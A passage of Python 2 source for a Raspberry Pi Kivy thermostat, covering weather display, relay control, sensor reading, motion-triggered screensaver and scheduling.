               "Heat: " + ( "[color=00ff00][b]On[/b][/color]" if GPIO.input( heatPin ) else "Off" ) + "\n " + \
               "Cool: " + ( "[color=00ff00][b]On[/b][/color]" if GPIO.input( coolPin ) else "Off" ) + "\n " + \
               "Fan: " + ( "[color=00ff00][b]On[/b][/color]" if GPIO.input( fanPin ) else "Auto" ) + "\n " + \
               "Sched: " + sched
# Static label/slider widgets for the full UI. The "alt" labels are dimmed
# duplicates shown on the minimal (screensaver) screen.
versionLabel = Label( text="Thermostat v" + str( THERMOSTAT_VERSION ), size_hint = ( None, None ), font_size='10sp', markup=True, text_size=( 150, 20 ) )
currentLabel = Label( text="[b]" + str( currentTemp ) + scaleUnits + "[/b]", size_hint = ( None, None ), font_size='100sp', markup=True, text_size=( 300, 200 ) )
altCurLabel  = Label( text=currentLabel.text, size_hint = ( None, None ), font_size='100sp', markup=True, text_size=( 300, 200 ), color=( 0.4, 0.4, 0.4, 0.2 ) )
setLabel     = Label( text=" Set\n[b]" + str( setTemp ) + scaleUnits + "[/b]", size_hint = ( None, None ), font_size='25sp', markup=True, text_size=( 100, 100 ) )
statusLabel  = Label( text=get_status_string(), size_hint = ( None, None ), font_size='20sp', markup=True, text_size=( 140, 130 ) )
dateLabel    = Label( text="[b]" + time.strftime("%a %b %d, %Y") + "[/b]", size_hint = ( None, None ), font_size='20sp', markup=True, text_size=( 270, 40 ) )
# Strip a leading zero from the hour for display ("09:30 pm" -> "9:30 pm").
timeStr      = time.strftime("%I:%M %p").lower()
timeLabel    = Label( text="[b]" + ( timeStr if timeStr[0:1] != "0" else timeStr[1:] ) + "[/b]", size_hint = ( None, None ), font_size='40sp', markup=True, text_size=( 180, 75 ) )
altTimeLabel = Label( text=timeLabel.text, size_hint = ( None, None ), font_size='40sp', markup=True, text_size=( 180, 75 ), color=( 0.4, 0.4, 0.4, 0.2 ) )
tempSlider   = Slider( orientation='vertical', min=minTemp, max=maxTemp, step=tempStep, value=setTemp, size_hint = ( None, None ) )
# Assigned in ThermostatApp.build() when the minimal UI is enabled.
screenMgr    = None
##############################################################################
#                                                                            #
#                   Weather functions/constants/widgets                      #
#                                                                            #
##############################################################################

# OpenWeatherMap configuration: location, API key and refresh intervals
# (settings values are minutes; converted to seconds here).
weatherLocation          = settings.get( "weather" )[ "location" ]
weatherAppKey            = settings.get( "weather" )[ "appkey" ]
weatherURLBase           = "http://api.openweathermap.org/data/2.5/"
weatherURLCurrent        = weatherURLBase + "weather?units=" + tempScale + "&q=" + weatherLocation + "&APPID=" + weatherAppKey
weatherURLForecast       = weatherURLBase + "forecast/daily?units=" + tempScale + "&q=" + weatherLocation + "&APPID=" + weatherAppKey
weatherURLTimeout        = settings.get( "weather" )[ "URLtimeout" ]
weatherRefreshInterval   = settings.get( "weather" )[ "weatherRefreshInterval" ] * 60
forecastRefreshInterval  = settings.get( "weather" )[ "forecastRefreshInterval" ] * 60
# Retry interval used after a failed fetch (shorter than the normal refresh).
weatherExceptionInterval = settings.get( "weather" )[ "weatherExceptionInterval" ] * 60

# Widgets for current conditions plus today's and tomorrow's forecasts.
weatherSummaryLabel       = Label( text="", size_hint = ( None, None ), font_size='20sp', markup=True, text_size=( 200, 20 ) )
weatherDetailsLabel       = Label( text="", size_hint = ( None, None ), font_size='20sp', markup=True, text_size=( 300, 150 ), valign="top" )
weatherImg                = Image( source="web/images/na.png", size_hint = ( None, None ) )
forecastTodaySummaryLabel = Label( text="", size_hint = ( None, None ), font_size='15sp', markup=True, text_size=( 100, 15 ) )
forecastTodayDetailsLabel = Label( text="", size_hint = ( None, None ), font_size='15sp', markup=True, text_size=( 200, 150 ), valign="top" )
forecastTodayImg          = Image( source="web/images/na.png", size_hint = ( None, None ) )
forecastTomoSummaryLabel  = Label( text="", size_hint = ( None, None ), font_size='15sp', markup=True, text_size=( 100, 15 ))
forecastTomoDetailsLabel  = Label( text="", size_hint = ( None, None ), font_size='15sp', markup=True, text_size=( 200, 150 ), valign="top" )
forecastTomoImg           = Image( source="web/images/na.png", size_hint = ( None, None ) )
def get_weather( url ):
    # Fetch and parse a JSON document from the given OpenWeatherMap URL.
    # Raises on network errors/timeouts; callers handle that. (urllib2 is
    # Python 2 — this file predates urllib.request.)
    return json.loads( urllib2.urlopen( url, None, weatherURLTimeout ).read() )
def get_cardinal_direction( heading ):
    """Map a wind heading in degrees to an 8-way compass point ("N".."NW").

    Works for any numeric heading (negative or >= 360 via the modulo).
    """
    # 9 entries: headings near 360 round up to index 8, which wraps to "N".
    directions = [ "N", "NE", "E", "SE", "S", "SW", "W", "NW", "N" ]
    # BUG FIX: divide by 45.0, not 45. Under Python 2 the original integer
    # division truncated for int headings (e.g. 350 -> 350/45 == 7 -> "NW"
    # instead of rounding 7.78 -> 8 -> "N"), skewing results counter-clockwise.
    return directions[ int( round( ( heading % 360 ) / 45.0 ) ) ]
def display_current_weather( dt ):
    """Kivy Clock callback: fetch current conditions and update the UI.

    On success refreshes the icon, summary and detail labels and logs the
    conditions; on any failure blanks them and retries sooner. Always
    reschedules itself (interval depends on success/failure).
    """
    with weatherLock:
        interval = weatherRefreshInterval
        try:
            weather = get_weather( weatherURLCurrent )
            weatherImg.source = "web/images/" + weather[ "weather" ][ 0 ][ "icon" ] + ".png"
            weatherSummaryLabel.text = "[b]" + weather[ "weather" ][ 0 ][ "description" ].title() + "[/b]"
            weatherDetailsLabel.text = "\n".join( (
                "Temp: " + str( int( round( weather[ "main" ][ "temp" ], 0 ) ) ) + scaleUnits,
                "Humidity: " + str( weather[ "main" ][ "humidity" ] ) + "%",
                "Wind: " + str( int( round( weather[ "wind" ][ "speed" ] * windFactor ) ) ) + windUnits + " " + get_cardinal_direction( weather[ "wind" ][ "deg" ] ),
                "Clouds: " + str( weather[ "clouds" ][ "all" ] ) + "%",
                "Sun: " + time.strftime("%H:%M", time.localtime( weather[ "sys" ][ "sunrise" ] ) ) + " am, " + time.strftime("%I:%M", time.localtime( weather[ "sys" ][ "sunset" ] ) ) + " pm"
            ) )
            log( LOG_LEVEL_INFO, CHILD_DEVICE_WEATHER_CURR, MSG_SUBTYPE_TEXT, weather[ "weather" ][ 0 ][ "description" ].title() + "; " + re.sub( '\n', "; ", re.sub( ' +', ' ', weatherDetailsLabel.text ).strip() ) )
        # BUG FIX: was a bare "except:", which also swallowed SystemExit and
        # KeyboardInterrupt. Network/JSON/key errors are what we expect here.
        except Exception:
            interval = weatherExceptionInterval
            weatherImg.source = "web/images/na.png"
            weatherSummaryLabel.text = ""
            weatherDetailsLabel.text = ""
            log( LOG_LEVEL_ERROR, CHILD_DEVICE_WEATHER_CURR, MSG_SUBTYPE_TEXT, "Update FAILED!" )
        Clock.schedule_once( display_current_weather, interval )
def get_precip_amount( raw ):
    # Convert a raw precipitation value into display units and format it:
    # metric amounts are shown as whole numbers, imperial keeps the decimals.
    converted = round( raw * precipFactor, precipRound )
    return str( int( converted ) ) if tempScale == "metric" else str( converted )
def display_forecast_weather( dt ):
    """Kivy Clock callback: fetch the daily forecast and show today/tomorrow.

    Updates both forecast panels (icon, summary, details, optional
    rain/snow line) and logs them; on failure blanks both panels and
    retries sooner. Always reschedules itself.
    """
    with weatherLock:
        interval = forecastRefreshInterval
        try:
            forecast = get_weather( weatherURLForecast )
            today    = forecast[ "list" ][ 0 ]
            tomo     = forecast[ "list" ][ 1 ]

            forecastTodayImg.source        = "web/images/" + today[ "weather" ][ 0 ][ "icon" ] + ".png"
            forecastTodaySummaryLabel.text = "[b]" + today[ "weather" ][ 0 ][ "description" ].title() + "[/b]"
            todayText = "\n".join( (
                "High: " + str( int( round( today[ "temp" ][ "max" ], 0 ) ) ) + scaleUnits + ", Low: " + str( int( round( today[ "temp" ][ "min" ], 0 ) ) ) + scaleUnits,
                "Humidity: " + str( today[ "humidity" ] ) + "%",
                "Wind: " + str( int( round( today[ "speed" ] * windFactor ) ) ) + windUnits + " " + get_cardinal_direction( today[ "deg" ] ),
                "Clouds: " + str( today[ "clouds" ] ) + "%",
            ) )
            # Optional precipitation line: "Rain: x", "Rain: x, Snow: y" or "Snow: y".
            if "rain" in today or "snow" in today:
                todayText += "\n"
                if "rain" in today:
                    todayText += "Rain: " + get_precip_amount( today[ "rain" ] ) + precipUnits
                    if "snow" in today:
                        todayText += ", Snow: " + get_precip_amount( today[ "snow" ] ) + precipUnits
                else:
                    todayText += "Snow: " + get_precip_amount( today[ "snow" ] ) + precipUnits
            forecastTodayDetailsLabel.text = todayText

            forecastTomoImg.source        = "web/images/" + tomo[ "weather" ][ 0 ][ "icon" ] + ".png"
            forecastTomoSummaryLabel.text = "[b]" + tomo[ "weather" ][ 0 ][ "description" ].title() + "[/b]"
            tomoText = "\n".join( (
                "High: " + str( int( round( tomo[ "temp" ][ "max" ], 0 ) ) ) + scaleUnits + ", Low: " + str( int( round( tomo[ "temp" ][ "min" ], 0 ) ) ) + scaleUnits,
                "Humidity: " + str( tomo[ "humidity" ] ) + "%",
                "Wind: " + str( int( round( tomo[ "speed" ] * windFactor ) ) ) + windUnits + " " + get_cardinal_direction( tomo[ "deg" ] ),
                "Clouds: " + str( tomo[ "clouds" ] ) + "%",
            ) )
            if "rain" in tomo or "snow" in tomo:
                tomoText += "\n"
                if "rain" in tomo:
                    tomoText += "Rain: " + get_precip_amount( tomo[ "rain" ] ) + precipUnits
                    if "snow" in tomo:
                        tomoText += ", Snow: " + get_precip_amount( tomo[ "snow" ] ) + precipUnits
                else:
                    tomoText += "Snow: " + get_precip_amount( tomo[ "snow" ] ) + precipUnits
            forecastTomoDetailsLabel.text = tomoText

            log( LOG_LEVEL_INFO, CHILD_DEVICE_WEATHER_FCAST_TODAY, MSG_SUBTYPE_TEXT, today[ "weather" ][ 0 ][ "description" ].title() + "; " + re.sub( '\n', "; ", re.sub( ' +', ' ', forecastTodayDetailsLabel.text ).strip() ) )
            log( LOG_LEVEL_INFO, CHILD_DEVICE_WEATHER_FCAST_TOMO, MSG_SUBTYPE_TEXT, tomo[ "weather" ][ 0 ][ "description" ].title() + "; " + re.sub( '\n', "; ", re.sub( ' +', ' ', forecastTomoDetailsLabel.text ).strip() ) )
        # BUG FIX: was a bare "except:" — narrow to Exception so that
        # SystemExit/KeyboardInterrupt are no longer swallowed.
        except Exception:
            interval = weatherExceptionInterval
            forecastTodayImg.source        = "web/images/na.png"
            forecastTodaySummaryLabel.text = ""
            forecastTodayDetailsLabel.text = ""
            forecastTomoImg.source         = "web/images/na.png"
            forecastTomoSummaryLabel.text  = ""
            forecastTomoDetailsLabel.text  = ""
            log( LOG_LEVEL_ERROR, CHILD_DEVICE_WEATHER_FCAST_TODAY, MSG_SUBTYPE_TEXT, "Update FAILED!" )
        Clock.schedule_once( display_forecast_weather, interval )
##############################################################################
#                                                                            #
#                           Utility Functions                                #
#                                                                            #
##############################################################################

def get_ip_address():
    """Return this machine's outward-facing IP address, or "127.0.0.1".

    Connecting a UDP socket sends no packets; it only selects the outgoing
    interface, whose local address is what we want. Failure (no network)
    falls back to loopback. Either way the result is logged.
    """
    s = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )
    s.settimeout( 10 )   # 10 seconds
    try:
        s.connect( ( "8.8.8.8", 80 ) )   # Google DNS server
        ip = s.getsockname()[0]
        log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM +"/settings/ip", ip, timestamp=False )
    except socket.error:
        ip = "127.0.0.1"
        log( LOG_LEVEL_ERROR, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/ip", "FAILED to get ip address, returning " + ip, timestamp=False )
    finally:
        # BUG FIX: the socket was never closed, leaking a file descriptor
        # on every call.
        s.close()
    return ip
def getVersion():
    # Publish the running software version over the logging/MQTT channel.
    log( LOG_LEVEL_STATE, CHILD_DEVICE_NODE, MSG_SUBTYPE_VERSION, THERMOSTAT_VERSION )
def restart():
    # Cleanly release hardware and I/O resources, then re-exec this script
    # in place. Triggered remotely (e.g. via an MQTT command).
    log( LOG_LEVEL_STATE, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/restart", "Thermostat restarting...", single=True )
    GPIO.cleanup()
    if logFile is not None:
        # Make sure buffered log data reaches the disk before we vanish.
        logFile.flush()
        os.fsync( logFile.fileno() )
        logFile.close()
    if mqttEnabled:
        mqttc.disconnect()
    os.execl( sys.executable, 'python', __file__, *sys.argv[1:] )  # This does not return!!!
def setLogLevel( msg ):
    """Change the runtime log level from a received control message.

    msg.payload must be a key of LOG_LEVELS; anything else is rejected
    and logged as an error.
    """
    global logLevel
    # BUG FIX: use a membership test instead of truthiness of .get().
    # The old "if LOG_LEVELS.get(msg.payload):" both looked the key up
    # twice and would wrongly reject any level whose numeric value is 0.
    if msg.payload in LOG_LEVELS:
        log( LOG_LEVEL_STATE, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/loglevel", "LogLevel set to: " + msg.payload )
        logLevel = LOG_LEVELS[ msg.payload ]
    else:
        log( LOG_LEVEL_ERROR, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/loglevel", "Invalid LogLevel: " + msg.payload )
##############################################################################
#                                                                            #
#                     Thermostat Implementation                              #
#                                                                            #
##############################################################################

# Main furnace/AC system control function:
def change_system_settings():
    # Drive the heat/cool/fan relay pins from the current mode buttons,
    # set temperature and measured temperature, with hysteresis to avoid
    # rapid relay cycling. Also persists state and logs any pin changes.
    with thermostatLock:
        # Snapshot pin states so we only log actual transitions below.
        hpin_start = str( GPIO.input( heatPin ) )
        cpin_start = str( GPIO.input( coolPin ) )
        fpin_start = str( GPIO.input( fanPin ) )
        if heatControl.state == "down":
            # Heat mode: cooling is forced off; heat turns on only once the
            # room is tempHysteresis below the set point, and off at/above it.
            GPIO.output( coolPin, GPIO.LOW )
            if setTemp >= currentTemp + tempHysteresis:
                GPIO.output( heatPin, GPIO.HIGH )
                GPIO.output( fanPin, GPIO.HIGH )
            elif setTemp <= currentTemp:
                GPIO.output( heatPin, GPIO.LOW )
                # Fan follows the call for heat unless manually forced on.
                if fanControl.state != "down" and not GPIO.input( coolPin ):
                    GPIO.output( fanPin, GPIO.LOW )
        else:
            GPIO.output( heatPin, GPIO.LOW )
            if coolControl.state == "down":
                # Cool mode: mirror image of heat mode above.
                if setTemp <= currentTemp - tempHysteresis:
                    GPIO.output( coolPin, GPIO.HIGH )
                    GPIO.output( fanPin, GPIO.HIGH )
                elif setTemp >= currentTemp:
                    GPIO.output( coolPin, GPIO.LOW )
                    if fanControl.state != "down" and not GPIO.input( heatPin ):
                        GPIO.output( fanPin, GPIO.LOW )
            else:
                # Neither heat nor cool selected: everything off unless the
                # fan is manually forced on.
                GPIO.output( coolPin, GPIO.LOW )
                if fanControl.state != "down" and not GPIO.input( heatPin ):
                    GPIO.output( fanPin, GPIO.LOW )
        if fanControl.state == "down":
            # Manual fan override always wins.
            GPIO.output( fanPin, GPIO.HIGH )
        else:
            if not GPIO.input( heatPin ) and not GPIO.input( coolPin ):
                GPIO.output( fanPin, GPIO.LOW )
        # save the thermostat state in case of restart
        state.put( "state", setTemp=setTemp,
                   heatControl=heatControl.state, coolControl=coolControl.state, fanControl=fanControl.state, holdControl=holdControl.state
                   )
        statusLabel.text = get_status_string()
        # Log only the pins whose state actually changed in this pass.
        if hpin_start != str( GPIO.input( heatPin ) ):
            log( LOG_LEVEL_STATE, CHILD_DEVICE_HEAT, MSG_SUBTYPE_BINARY_STATUS, "1" if GPIO.input( heatPin ) else "0" )
        if cpin_start != str( GPIO.input( coolPin ) ):
            log( LOG_LEVEL_STATE, CHILD_DEVICE_COOL, MSG_SUBTYPE_BINARY_STATUS, "1" if GPIO.input( coolPin ) else "0" )
        if fpin_start != str( GPIO.input( fanPin ) ):
            log( LOG_LEVEL_STATE, CHILD_DEVICE_FAN, MSG_SUBTYPE_BINARY_STATUS, "1" if GPIO.input( fanPin ) else "0" )
# This callback will be bound to the touch screen UI buttons:
def control_callback( control ):
    # Handle a toggle-button press: refresh its colour, enforce that Heat
    # and Cool are mutually exclusive, and reload the matching schedule.
    with thermostatLock:
        setControlState( control, control.state )  # make sure we change the background colour!
        if control is coolControl:
            if control.state == "down":
                setControlState( heatControl, "normal" )
            reloadSchedule()
        if control is heatControl:
            if control.state == "down":
                setControlState( coolControl, "normal" )
            reloadSchedule()
# Check the current sensor temperature
def check_sensor_temp( dt ):
    # Periodic Clock callback: read the I2C temperature sensor, apply the
    # two-point calibration, refresh the on-screen labels (both UIs) and
    # run the relay control logic.
    with thermostatLock:
        global currentTemp, priorCorrected
        global tempSensor
        if tempSensor is not None:
            # Raw I2C transaction at address 0x40, command 0xF3 with the
            # conversion (raw * 175.72 / 65536 - 46.85) — this matches an
            # Si7021/HTU21D-style "measure temperature" sequence; TODO
            # confirm against the actual sensor's datasheet.
            bus = smbus.SMBus(1)
            time.sleep(0.3)
            bus.write_byte(0x40, 0xF3)
            time.sleep(0.3)
            data0 = bus.read_byte(0x40)
            data1 = bus.read_byte(0x40)
            # rawTemp = tempSensor.get_temperature( sensorUnits )
            rawTemp = ((data0 * 256 + data1) * 175.72 / 65536.0) - 46.85
            # Two-point linear calibration using the measured freezing
            # reference values configured elsewhere in this file.
            correctedTemp = ( ( ( rawTemp - freezingMeasured ) * referenceRange ) / measuredRange ) + freezingPoint
            currentTemp = round( correctedTemp, 1 )
            log( LOG_LEVEL_DEBUG, CHILD_DEVICE_TEMP, MSG_SUBTYPE_CUSTOM + "/raw", str( rawTemp ) )
            log( LOG_LEVEL_DEBUG, CHILD_DEVICE_TEMP, MSG_SUBTYPE_CUSTOM + "/corrected", str( correctedTemp ) )
            # Only publish when the reading moved by at least TEMP_TOLERANCE.
            if abs( priorCorrected - correctedTemp ) >= TEMP_TOLERANCE:
                log( LOG_LEVEL_STATE, CHILD_DEVICE_TEMP, MSG_SUBTYPE_TEMPERATURE, str( currentTemp ) )
                priorCorrected = correctedTemp
        # Refresh temperature, date and time on both the full and minimal UIs.
        currentLabel.text = "[b]" + str( currentTemp ) + scaleUnits + "[/b]"
        altCurLabel.text = currentLabel.text
        dateLabel.text = "[b]" + time.strftime("%a %b %d, %Y") + "[/b]"
        timeStr = time.strftime("%I:%M %p").lower()
        timeLabel.text = ( "[b]" + ( timeStr if timeStr[0:1] != "0" else timeStr[1:] ) + "[/b]" ).lower()
        altTimeLabel.text = timeLabel.text
        change_system_settings()
# This is called when the desired temp slider is updated:
def update_set_temp( slider, value ):
    # Bound to the slider's on_touch_down/on_touch_move events; "value" is
    # the touch event and is unused — the new set point is read from
    # slider.value. Logs only when the set point actually changed.
    with thermostatLock:
        global setTemp
        priorTemp = setTemp
        setTemp = round( slider.value, 1 )
        setLabel.text = " Set\n[b]" + str( setTemp ) + scaleUnits + "[/b]"
        if priorTemp != setTemp:
            log( LOG_LEVEL_STATE, CHILD_DEVICE_UICONTROL_SLIDER, MSG_SUBTYPE_TEMPERATURE, str( setTemp ) )
# Check the PIR motion sensor status
def check_pir( pin ):
    # Periodic Clock callback: on motion, restart the minimal-UI timeout
    # and (outside the configured "ignore" window) wake the full UI.
    global minUITimer
    with thermostatLock:
        if GPIO.input( pirPin ):
            log( LOG_LEVEL_INFO, CHILD_DEVICE_PIR, MSG_SUBTYPE_TRIPPED, "1" )
            # Motion resets the countdown to the minimal (screensaver) UI.
            if minUITimer != None:
                Clock.unschedule( show_minimal_ui )
            minUITimer = Clock.schedule_once( show_minimal_ui, minUITimeout )
            ignore = False
            now = datetime.datetime.now().time()
            # The ignore window may wrap past midnight (from > to), so the
            # comparison differs for the wrapped and non-wrapped cases.
            if pirIgnoreFrom > pirIgnoreTo:
                if now >= pirIgnoreFrom or now < pirIgnoreTo:
                    ignore = True
            else:
                if now >= pirIgnoreFrom and now < pirIgnoreTo:
                    ignore = True
            if screenMgr.current == "minimalUI" and not( ignore ):
                screenMgr.current = "thermostatUI"
                log( LOG_LEVEL_DEBUG, CHILD_DEVICE_SCREEN, MSG_SUBTYPE_TEXT, "Full" )
        else:
            log( LOG_LEVEL_DEBUG, CHILD_DEVICE_PIR, MSG_SUBTYPE_TRIPPED, "0" )
# Minimal UI Display functions and classes
def show_minimal_ui( dt ):
    # Clock callback: switch to the dimmed minimal (screensaver) screen.
    with thermostatLock:
        screenMgr.current = "minimalUI"
        log( LOG_LEVEL_DEBUG, CHILD_DEVICE_SCREEN, MSG_SUBTYPE_TEXT, "Minimal" )
class MinimalScreen( Screen ):
    # Screensaver screen: any completed touch wakes the full UI and
    # restarts the minimal-UI timeout.

    def on_touch_down( self, touch ):
        # Grab the touch so the matching on_touch_up is delivered to us.
        if self.collide_point( *touch.pos ):
            touch.grab( self )
            return True

    def on_touch_up( self, touch ):
        global minUITimer
        if touch.grab_current is self:
            touch.ungrab( self )
            with thermostatLock:
                # Restart the countdown back to the minimal UI.
                if minUITimer != None:
                    Clock.unschedule( show_minimal_ui )
                minUITimer = Clock.schedule_once( show_minimal_ui, minUITimeout )
                self.manager.current = "thermostatUI"
                log( LOG_LEVEL_DEBUG, CHILD_DEVICE_SCREEN, MSG_SUBTYPE_TEXT, "Full" )
            return True
##############################################################################
#                                                                            #
#                      Kivy Thermostat App class                             #
#                                                                            #
##############################################################################

class ThermostatApp( App ):

    def build( self ):
        """Construct and return the root widget tree.

        Lays out the full thermostat UI, optionally wraps it together with
        the minimal (screensaver) UI in a ScreenManager, and starts the
        periodic sensor/weather timers.
        """
        # BUG FIX: minUITimer is module-level state shared with check_pir()
        # and MinimalScreen (both declare "global minUITimer"). Without this
        # declaration the assignment further down created an unrelated local,
        # so the initial timer handle was never visible to those callbacks.
        global screenMgr, minUITimer
        # Set up the thermostat UI layout:
        thermostatUI = FloatLayout( size=( 800, 480 ) )
        # Make the background black:
        with thermostatUI.canvas.before:
            Color( 0.0, 0.0, 0.0, 1 )
            self.rect = Rectangle( size=( 800, 480 ), pos=thermostatUI.pos )
        # Create the rest of the UI objects ( and bind them to callbacks, if necessary ):
        wimg = Image( source='web/images/logo.png' )
        coolControl.bind( on_press=control_callback )
        heatControl.bind( on_press=control_callback )
        fanControl.bind( on_press=control_callback )
        holdControl.bind( on_press=control_callback )
        tempSlider.bind( on_touch_down=update_set_temp, on_touch_move=update_set_temp )
        # set sizing and position info (fixed 800x480 layout)
        wimg.size = ( 80, 80 )
        wimg.size_hint = ( None, None )
        wimg.pos = ( 10, 380 )
        heatControl.size = ( 80, 80 )
        heatControl.pos = ( 680, 380 )
        coolControl.size = ( 80, 80 )
        coolControl.pos = ( 680, 270 )
        fanControl.size = ( 80, 80 )
        fanControl.pos = ( 680, 160 )
        statusLabel.pos = ( 670, 40 )
        tempSlider.size = ( 100, 360 )
        tempSlider.pos = ( 570, 20 )
        holdControl.size = ( 80, 80 )
        holdControl.pos = ( 480, 380 )
        setLabel.pos = ( 590, 390 )
        currentLabel.pos = ( 390, 290 )
        dateLabel.pos = ( 180, 370 )
        timeLabel.pos = ( 335, 380 )
        weatherImg.pos = ( 265, 160 )
        weatherSummaryLabel.pos = ( 430, 160 )
        weatherDetailsLabel.pos = ( 395, 60 )
        versionLabel.pos = ( 320, 0 )
        forecastTodayHeading = Label( text="[b]Today[/b]:", font_size='20sp', markup=True, size_hint = ( None, None ), pos = ( 0, 290 ) )
        forecastTodayImg.pos = ( 0, 260 )
        forecastTodaySummaryLabel.pos = ( 100, 260 )
        forecastTodayDetailsLabel.pos = ( 80, 167 )
        forecastTomoHeading = Label( text="[b]Tomorrow[/b]:", font_size='20sp', markup=True, size_hint = ( None, None ), pos = ( 20, 130 ) )
        forecastTomoImg.pos = ( 0, 100 )
        forecastTomoSummaryLabel.pos = ( 100, 100 )
        forecastTomoDetailsLabel.pos = ( 80, 7 )
        # Add the UI elements to the thermostat UI layout:
        thermostatUI.add_widget( wimg )
        thermostatUI.add_widget( coolControl )
        thermostatUI.add_widget( heatControl )
        thermostatUI.add_widget( fanControl )
        thermostatUI.add_widget( holdControl )
        thermostatUI.add_widget( tempSlider )
        thermostatUI.add_widget( currentLabel )
        thermostatUI.add_widget( setLabel )
        thermostatUI.add_widget( statusLabel )
        thermostatUI.add_widget( dateLabel )
        thermostatUI.add_widget( timeLabel )
        thermostatUI.add_widget( weatherImg )
        thermostatUI.add_widget( weatherSummaryLabel )
        thermostatUI.add_widget( weatherDetailsLabel )
        thermostatUI.add_widget( versionLabel )
        thermostatUI.add_widget( forecastTodayHeading )
        thermostatUI.add_widget( forecastTodayImg )
        thermostatUI.add_widget( forecastTodaySummaryLabel )
        thermostatUI.add_widget( forecastTodayDetailsLabel )
        thermostatUI.add_widget( forecastTomoHeading )
        thermostatUI.add_widget( forecastTomoImg )
        thermostatUI.add_widget( forecastTomoDetailsLabel )
        thermostatUI.add_widget( forecastTomoSummaryLabel )
        layout = thermostatUI
        # Minimal UI initialization (dimmed screensaver screen + PIR wake-up)
        if minUIEnabled:
            uiScreen = Screen( name="thermostatUI" )
            uiScreen.add_widget( thermostatUI )
            minScreen = MinimalScreen( name="minimalUI" )
            minUI = FloatLayout( size=( 800, 480 ) )
            with minUI.canvas.before:
                Color( 0.0, 0.0, 0.0, 1 )
                self.rect = Rectangle( size=( 800, 480 ), pos=minUI.pos )
            altCurLabel.pos = ( 390, 290 )
            altTimeLabel.pos = ( 335, 380 )
            minUI.add_widget( altCurLabel )
            minUI.add_widget( altTimeLabel )
            minScreen.add_widget( minUI )
            screenMgr = ScreenManager( transition=NoTransition() )  # FadeTransition seems to have OpenGL bugs in Kivy Dev 1.9.1 and is unstable, so sticking with no transition for now
            screenMgr.add_widget ( uiScreen )
            screenMgr.add_widget ( minScreen )
            layout = screenMgr
            minUITimer = Clock.schedule_once( show_minimal_ui, minUITimeout )
            if pirEnabled:
                Clock.schedule_interval( check_pir, pirCheckInterval )
        # Start checking the temperature
        Clock.schedule_interval( check_sensor_temp, tempCheckInterval )
        # Show the current weather & forecast
        Clock.schedule_once( display_current_weather, 5 )
        Clock.schedule_once( display_forecast_weather, 10 )
        return layout
##############################################################################
#                                                                            #
#                        Scheduler Implementation                            #
#                                                                            #
##############################################################################

def startScheduler():
    # Background-thread body: every 10 seconds run any pending scheduled
    # set-point changes, unless the Hold button is engaged.
    log( LOG_LEVEL_INFO, CHILD_DEVICE_SCHEDULER, MSG_SUBTYPE_TEXT, "Started" )
    while True:
        if holdControl.state == "normal":
            with scheduleLock:
                log( LOG_LEVEL_DEBUG, CHILD_DEVICE_SCHEDULER, MSG_SUBTYPE_TEXT, "Running pending" )
                schedule.run_pending()
        time.sleep( 10 )
def setScheduledTemp( temp ):
    # Scheduler job: apply a scheduled set point (unless Hold is engaged),
    # keeping the label and slider in sync and logging the change.
    with thermostatLock:
        global setTemp
        if holdControl.state != "normal":
            return
        setTemp = round( temp, 1 )
        setLabel.text = " Set\n[b]" + str( setTemp ) + scaleUnits + "[/b]"
        tempSlider.value = setTemp
        log( LOG_LEVEL_STATE, CHILD_DEVICE_SCHEDULER, MSG_SUBTYPE_TEMPERATURE, str( setTemp ) )
def getTestSchedule():
    # Build a synthetic schedule with one entry per minute of every day,
    # alternating between two base temperatures (scale-dependent) plus a
    # small per-day offset — used to exercise the scheduler quickly.
    testSched = {}
    dayNames = [ "monday", "tuesday", "wednesday", "thursday", "friday", "saturday", "sunday" ]
    for dayIndex, dayName in enumerate( dayNames ):
        entries = []
        for minuteOfDay in range( 60 * 24 ):
            hrs, mins = divmod( minuteOfDay, 60 )
            if minuteOfDay % 2 == 1:
                base = 19.0 if tempScale == "metric" else 68.0
            else:
                base = 22.0 if tempScale == "metric" else 72.0
            timeText = str( hrs ).rjust( 2, '0' ) + ":" + str( mins ).rjust( 2, '0' )
            entries.append( [ timeText, float( dayIndex + 1 ) / 10.0 + base ] )
        testSched[ dayName ] = entries
    return testSched
def reloadSchedule():
    # Rebuild all scheduler jobs from the JSON schedule file (or the test
    # schedule), choosing the "heat" or "cool" table based on the active
    # mode button. Hold suppresses file-based schedules entirely.
    # NOTE: acquires scheduleLock then thermostatLock — callers already
    # holding thermostatLock rely on the lock types allowing this ordering.
    with scheduleLock:
        schedule.clear()
        activeSched = None
        with thermostatLock:
            thermoSched = JsonStore( "thermostat_schedule.json" )
            if holdControl.state != "down":
                if heatControl.state == "down":
                    activeSched = thermoSched[ "heat" ]
                    log( LOG_LEVEL_INFO, CHILD_DEVICE_SCHEDULER, MSG_SUBTYPE_CUSTOM + "/load", "heat" )
                elif coolControl.state == "down":
                    activeSched = thermoSched[ "cool" ]
                    log( LOG_LEVEL_INFO, CHILD_DEVICE_SCHEDULER, MSG_SUBTYPE_CUSTOM + "/load", "cool" )
            # The test schedule (when enabled) overrides the file schedule.
            if useTestSchedule:
                activeSched = getTestSchedule()
                log( LOG_LEVEL_INFO, CHILD_DEVICE_SCHEDULER, MSG_SUBTYPE_CUSTOM + "/load", "test" )
                print "Using Test Schedule!!!"
        if activeSched != None:
            # Register one scheduler job per (day, time, temperature) entry.
            for day, entries in activeSched.iteritems():
                for i, entry in enumerate( entries ):
                    getattr( schedule.every(), day ).at( entry[ 0 ] ).do( setScheduledTemp, entry[ 1 ] )
                    log( LOG_LEVEL_DEBUG, CHILD_DEVICE_SCHEDULER, MSG_SUBTYPE_TEXT, "Set " + day + ", at: " + entry[ 0 ] + " = " + str( entry[ 1 ] ) + scaleUnits )
##############################################################################
#                                                                            #
#                          Web Server Interface                              #
#                                                                            #
##############################################################################

class WebInterface( object ):
    """CherryPy handler exposing the thermostat over HTTP.

    Pages are plain HTML templates under web/html/ with @@placeholder@@
    tokens substituted from the live thermostat state.
    """

    def _template( self, path ):
        # Read an HTML template from disk. BUG FIX: the originals used
        # open()/read()/close() without try/finally, leaking the handle if
        # read() raised, and shadowed the "file" builtin.
        with open( path, "r" ) as f:
